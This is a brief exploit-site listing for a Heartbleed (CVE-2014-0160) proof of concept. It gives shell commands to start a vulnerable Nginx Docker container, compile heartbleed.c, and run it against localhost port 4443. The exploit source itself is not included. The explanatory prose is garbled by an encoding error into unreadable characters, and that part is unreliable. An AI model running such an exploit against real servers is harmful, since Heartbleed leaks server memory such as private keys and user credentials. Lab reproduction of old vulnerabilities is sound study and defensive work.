Sploitus

Exploit for heartbleed

kitploit ยท 2026-08-25

Exploit Code

MARKDOWN27 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GUILLERMOESCOBERO-HEARTBLEED
# heartbleed

CVE-2014-0160 OpenSSL Heartbleed ุฅุซุจุงุช ุงู„ู…ูู‡ูˆู…

ู‚ู… ุจุชู†ุฒูŠู„ ูˆุชุดุบูŠู„ ุญุงูˆูŠุฉ Docker (ุฎุงุฏู… Nginx ุงู„ู‚ุงุจู„ ู„ู„ุงุฎุชุฑุงู‚)

root@kitploit:~
    
    
    docker run -p 4443:443 -it --rm --name hb gescobero/heartbleed:1.0
    

ู‚ู… ุจุชุฌู…ูŠุน ู‡ุฌูˆู… Heartbleed

root@kitploit:~
    
    
    gcc heartbleed.c -o heartbleed
    

ู†ูู‘ุฐู‡ ู…ุน ุฎุงุฏู… Nginx ูƒู‡ุฏู

root@kitploit:~
    
    
    ./heartbleed 127.0.0.1 4443